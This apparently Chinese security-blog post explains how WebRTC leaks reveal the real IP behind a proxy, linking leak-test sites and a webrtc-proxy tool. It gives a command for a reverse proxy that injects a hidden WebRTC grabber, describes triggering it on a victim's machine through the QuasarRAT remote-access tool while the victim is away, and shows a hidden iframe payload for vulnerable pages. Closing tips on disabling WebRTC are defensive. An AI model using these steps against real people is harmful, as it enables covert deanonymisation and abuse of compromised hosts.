现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安“设为星标”,否则可能看不到了!
0x00 前言
目前想到在实战中可利用的场景有:HW攻防演练、BC/ZP溯源对方真实IP等...。
0x01 泄露原因
0x02 在线检测
https://ip8.com/webrtc-test
https://www.hackjie.com/tracking
https://browserleaks.com/webrtc
https://surfshark.com/zh/webrtc-leak-test
注:群里几个小伙伴用他们的VP嗯也测试了下,但发现并没有显示真实IP,有时只会显示一个内网IP;由于我没有VP嗯就不测试了,大家有的可以自己去测试下。
0x03 项目介绍
项目地址:https://github.com/iiiusky/webrtc-proxy
0x04 实战场景
1. 钓鱼场景利用
执行以下命令可反代指定网站并生成一个webrtc地址以隐藏形式插入到body标签中,不过我们最好还是反代他们自己网站或者常用网站,要不容易被管理发现异常。
./WebRtc -d 1.***.**.84 -t https://www.baidu.com -p 80 --disable-random-log
因为要通过他们主机的浏览器去访问我们的反代地址,有啥浏览器就用啥吧,但最好还是先观察下对方是否在电脑前,趁其不在时再去操作。
反正也就“3秒”的事,等完事了再“擦擦”...。
这里我用的QuasarRAT开源远控进行测试,通过“Sent to Website”功能使用他们主机的默认浏览器访问反代地址或webrtc地址,但需要将“隐藏访问”选项取消勾选。
执行以上操作后对方主机就会使用默认浏览器访问我们给定的这个网址,这时可以看到已经成功获取到他代理背后的真实IP了,如下图所示。
反向代理开启后会在当前目录下生成两个日志文件,access为访问日志,另一个为webrtc日志,找到的真实IP就会写入在这个文件中,如下图所示。
注意事项:
补充:最近了解到一个叫HVNC的东东,理论上应该是可行的,但我并没有去测试;国外大多数RAT都有这功能,如:Venom RAT,大家可以自己去测试下。HVNC!隐藏桌面CobaltStrike插件
2. 漏洞场景利用
title="Damn Vulnerable Web Application (DVWA)-v1.9"
<iframe style="display:none;" src="webrtc"></iframe>
0x05 防范措施
谷歌、火狐浏览器可通过安装WebRTC Leak Shield插件禁用webrtc;也可以通过以下方式禁用webrtc。
about:config,将media.peerconnection.enabled值改为false;
0x06 文末总结
关注我们
还在等什么?赶紧点击下方名片开始学习吧!
信 安 考 证
CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001... |
推 荐 阅 读
文章引用微信公众号"潇湘信安",如有侵权,请联系管理员删除!